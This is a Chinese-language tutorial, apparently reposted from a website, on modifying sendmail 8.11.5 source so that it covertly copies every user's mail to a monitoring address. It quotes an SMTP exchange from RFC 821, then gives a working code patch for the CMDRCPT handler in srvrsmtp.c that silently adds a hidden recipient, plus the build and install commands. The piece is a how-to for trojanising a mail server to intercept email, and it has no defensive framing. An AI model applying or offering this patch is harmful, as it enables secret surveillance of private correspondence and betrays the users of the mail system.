一、简介
如果你的邮件系统是用sendmail,不论你是用它来发送、接收邮件还是仅仅将其作为一台Mail Relay Host,你都可以通过简单的修改一下sendmail源代码来捕获用户的邮件。
二、环境
FreeBSD 4.3 Release + sendmail 8.11.5,从www.sendmail.org下载源代码包sendmail-8.11.5.tar.gz,运行:
# tar zxvf sendmail-8.11.5.tar.gz
在当前目录下生成sendmail-8.11.5目录
三、步骤
先让我们来看一个SMTP通信的例子:(参考:rfc821.txt)
This SMTP example shows mail sent by Smith at host Alpha.ARPA,
to Jones, Green, and Brown at host Beta.ARPA. Here we assume
that host Alpha contacts host Beta directly.
S: MAIL FROM:
R: 250 OK
S: RCPT TO:
R: 250 OK
S: RCPT TO:
R: 550 No sUCh user here
S: RCPT TO:
R: 250 OK
S: DATA
R: 354 Start mail input; end with .
S: Blah blah blah...
S: ...etc. etc. etc.
S: .
R: 250 OK
虽然在一个SMTP过程中可能还有很多其他命令的交互,但核心的就这么三步:MAIL FROM、RCPT TO、DATA。在./sendmail-8.11.5/sendmail下有一个文件srvrsmtp.c,有一个大函数smtp(),它里面的switch循环就是专门处理SMTP通信,即上面例子中R响应。任何一个SMTP 过来的邮件 —— 不论是来自Outlook eXPress这样的邮件客户端软件,还是Internet上的一台MAIL HOST,smtp()依次处理对方发送过来的MAIL FROM、RCPT TO、DATA命令,从中获得send、recipient list、message,统统存入一个struct ENVELOPE变量中,最后调用sendall()再将邮件转给recipient list。因此,我们只需要在smtp()处理RCPT TO时将我们的监控E-mail Address加进去就可以了。
1、首先在smtp()变量声明处加入一个变量:
int spydone = 0;
2、打开srvrsmtp.c,搜索关键字:case CMDRCPT,从这行开始往下的201行是处理recipient list代码。在该case段的最后一行 ,即break;前,我们插入如下代码:
if(!spydone)
{
a = parseaddr("", NULLADDR, RF_COPYALL, ' ', &delimptr, e); /* 将
[email protected]换成监控e-mail */
a = recipient(a, &e->e_sendqueue, 0, e);
e->e_to = a->q_paddr;
nrcpts++;
spydone = 1;
}
保存退出,在./sendmail-8.11.5下运行:make; make install 编译、安装。经过修改的sendmail,对于用户接收发送的邮件,都会发送一份到
[email protected]里。
(出处:http://www.sheup.com)